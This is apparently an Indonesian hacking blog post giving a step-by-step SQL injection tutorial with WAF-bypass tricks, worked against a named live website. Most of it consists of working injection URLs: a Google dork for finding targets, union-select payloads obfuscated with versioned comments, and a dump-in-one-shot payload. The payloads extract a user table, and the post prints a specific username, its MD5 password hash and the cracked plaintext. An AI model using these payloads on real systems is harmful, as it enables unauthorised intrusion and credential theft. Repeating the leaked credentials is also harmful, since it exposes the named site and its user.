Selasa, 19 Mei 2020

Tutorial SQL Injection Bypass WAF

       Halo guys welcome back with DemonX, sekarang Demon mau bahas SQL injection manual bypass WAF, buat kalian yang ga tau WAF itu apa. WAF adalah Website Application Firewall yang artinya website tersebut memiliki keamanan yang kuat, namun bukan berarti tidak bisa di retas heheh :v

Dork: "inurl: .php?id=" 
NB: tanpa tanda petik lur 

itu adalah dork global, dan belum dikembangkan lagi. Silahkan kalian kembangkan sendiri ea :v ga perlu panjang yang penting efektif

Nah btw Demon udah ada live target yang cocok nih :v

http://www.interaliaproject.com/news.php?id=115

1. Nah itu live target Demon, coba kalian berikan tanda petik dibelakang ( ' )


2. dan muncul pesan error, kita lanjutkan dengan eksekusi order by dari yang tidak error sampe error

http://www.interaliaproject.com/news.php?id=115' order by 7--+-



3. Nah disini Demon nemu error di order by yang ke tujuh, berarti web tsb. hanya memiliki 6 table saja, lanjut kita masukan union select sampai 6 kali

http://www.interaliaproject.com/news.php?id=115' union select 1,2,3,4,5,6--+-

dan muncul pesan error




4. Masukkan kode injeksi ini:

/*!12345union*/+/*!12345select*/

tepat dibelakang tanda ( ' ) contoh:

www.interaliaproject.com/news.php?id=115'/*!12345union*/+/*!12345select*/+1,2,3,4,5,6--+-

Dan enter ..


Nah disini kita udah bisa nemuin togel nya :v

5. Kalian pilih saja diantara salah 1 angka itu dan kalo kalian mau tau databasenya caranya adalah:

www.interaliaproject.com/news.php?id=115'/*!12345union*/+/*!12345select*/+1,2,database(),4,5,6--+-

Demon pakai angka 3 dan akan keluar database nya adalah: interali_project

6. Dump Tabel dari database

Disini Demon mau dump pakai DIOS (Dump In One Shot), DIOS nya:

/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@)

caranya kita sisipin di salah 1 angka togelnya, demon pakai di angka 2

www.interaliaproject.com/news.php?id=115'/*!12345union*/+/*!12345select*/+1,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@),database(),4,5,6--+-


 7. Dump Username dan Password

Selanjutnya adalah dump username dan password, dengan cara kalian ubah information_schema.columns menjadi tabel nya, dan ubah table_name serta column_name menjadi masing masing username dan password sehingga menjadi seperti ini:

www.interaliaproject.com/news.php?id=115'/*!12345union*/+/*!12345select*/+1,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345usertable*/)where@:=make_set(511,@,0x3c6c693e,/*!12345username*/,/*!12345password*/)),@),database(),4,5,6--+-



Disini kita dapat username dan password yang masih terenkripsi, demon mau coba hash yang bawah aja dari username antonis

md5:

cd64c618627016120817ca5eaeb9a29e

8. Decrypt md5

Untuk decrypt, bisa disini



dan password yang terenkripsi sudah kita hash: psiouras



9. Mencari admin login

Untuk hal ini, silahkan kalian cari sendiri lur :v jangan manja manja xixixi ...


Kalo ada yang mau ditanyakan, hubungi DemonX

Tidak ada komentar:

Posting Komentar

Highlited Post By DemonX

Intip Dunia IT secara Universal

       Hello guys ini postingan perdana Demon untuk blogspot, sekarang demon mau basa basi dulu seputar Hacking dan dunia IT. Saat ini kedu...